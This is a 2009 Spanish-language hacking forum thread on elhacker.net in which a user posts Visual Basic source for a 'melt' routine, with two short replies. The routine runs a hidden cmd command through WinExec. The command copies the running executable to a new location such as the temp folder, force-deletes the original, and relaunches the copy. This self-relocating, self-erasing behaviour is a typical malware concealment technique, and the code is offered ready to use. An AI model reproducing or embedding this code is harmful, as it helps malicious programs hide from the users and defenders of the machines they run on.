elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [SRC][SNIPPET] Alternativa de Melt (WinExec)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [SRC][SNIPPET] Alternativa de Melt (WinExec)  (Leído 3,886 veces)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
[SRC][SNIPPET] Alternativa de Melt (WinExec)
« en: 27 Enero 2009, 22:19 pm »

Buenas, hace tiempo que se me ocurrio este code al ver el api WinExec... pero nunca lo desarrolle... y bueno, me dio hoy por hacerlo...

Simplente es una alternativa a crear un Bat en el disco, lo hace todo 'on the fly' :laugh:

Código
  1. Option Explicit
  2. Private Declare Function WinExec Lib "kernel32.dll" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
  3. Private Declare Function GetModuleFileName Lib "kernel32.dll" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
  4.  
  5. '---------------------------------------------------------------------------------------
  6. ' Procedimiento : AlterMelt
  7. ' Autor         : Karcrack
  8. ' Fecha         : 27/01/2009
  9. ' Parametro(s)  :
  10. ' sNewPath [in]       -> La nueva ruta para el fichero al que se le aplicara el Melt
  11. ' sPath [in,optional] -> La ruta del fichero al que se le aplicara el Melt.
  12. '                   Si es NULL se aplicara a la aplicacion propia (=
  13. ' dMs [in,optional]   -> Es el tiempo en segundos de espera entre la copia
  14. '                    y la eliminacion del fichero. Por defecto 1 seg.
  15. '
  16. ' Return        : Devuelve True si la ejecucion del comando ha sido satisfactoria.
  17. '---------------------------------------------------------------------------------------
  18.  
  19. Public Function AlterMelt(ByVal sNewPath As String, Optional ByVal sPath As String, Optional ByVal dSec As Double = 2) As Boolean
  20.    Dim sCmd    As String
  21.  
  22.    If (sPath = vbNullString) Then
  23.        If (App.LogMode = 0) Then Exit Function 'No queremos aplicar Melt a nuestro VS xD
  24.        sPath = Space$(260) 'MAX_PATH = 260
  25.        sPath = Left$(sPath, GetModuleFileName(0&, sPath, Len(sPath)))
  26.    End If
  27.  
  28.    sCmd = "CMD /D /C " & "copy " & Chr$(34) & sPath & Chr$(34) & " " & Chr$(34) & sNewPath & Chr$(34) & " & " & _
  29.            IIf((dSec > 0), "ping 0.0.0.0 -n " & dSec & " & ", vbNullString) & _
  30.            "del /F /Q " & Chr$(34) & sPath & Chr$(34) & " & " & _
  31.            Chr$(34) & sNewPath & Chr$(34) & " & " & _
  32.            "exit"
  33.    AlterMelt = (WinExec(sCmd, 0&) > 31) 'SW_HIDE As Long = 0
  34. End Function

Creo que todo el mundo sabe lo que es el Melt no? :huh: :xD

Esta seria la forma de usarlo:
Código
  1. Call AlterMelt(Environ$("TMP") & App.EXEName & ".exe", vbNullString, 5)
  2. End

Saludos, espero que os sea de utilidad ;D


« Última modificación: 7 Octubre 2009, 01:09 am por Karcrack » En línea

‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: [SRC][SNIPPET] Alternativa de Melt (WinExec)
« Respuesta #1 en: 28 Enero 2009, 18:38 pm »

no sabia de la existencia de esa api...
esta curiosoo!
 yo usaba el tipo bat para realizar operaciones externas y confundir al jefe.

Saludos!


En línea

Dessa


Desconectado Desconectado

Mensajes: 624



Ver Perfil
Re: [SRC][SNIPPET] Alternativa de Melt (WinExec)
« Respuesta #2 en: 28 Enero 2009, 19:23 pm »

WinExec, CmdLine, CmdShow, suena interesante

gracias por el aporte, saludos
En línea

Adrian Desanti
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[FUNCION] Autoit MELT
Scripting
79137913 0 1,842 Último mensaje 10 Diciembre 2013, 14:57 pm
por 79137913
[VBS]Perfect Melt
Scripting
xXSCORPIOXx 7 3,631 Último mensaje 21 Marzo 2014, 01:58 am
por 79137913
Problema winexec y rmdir MASM
ASM
.:UND3R:. 2 2,737 Último mensaje 26 Mayo 2014, 17:36 pm
por Eternal Idol
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines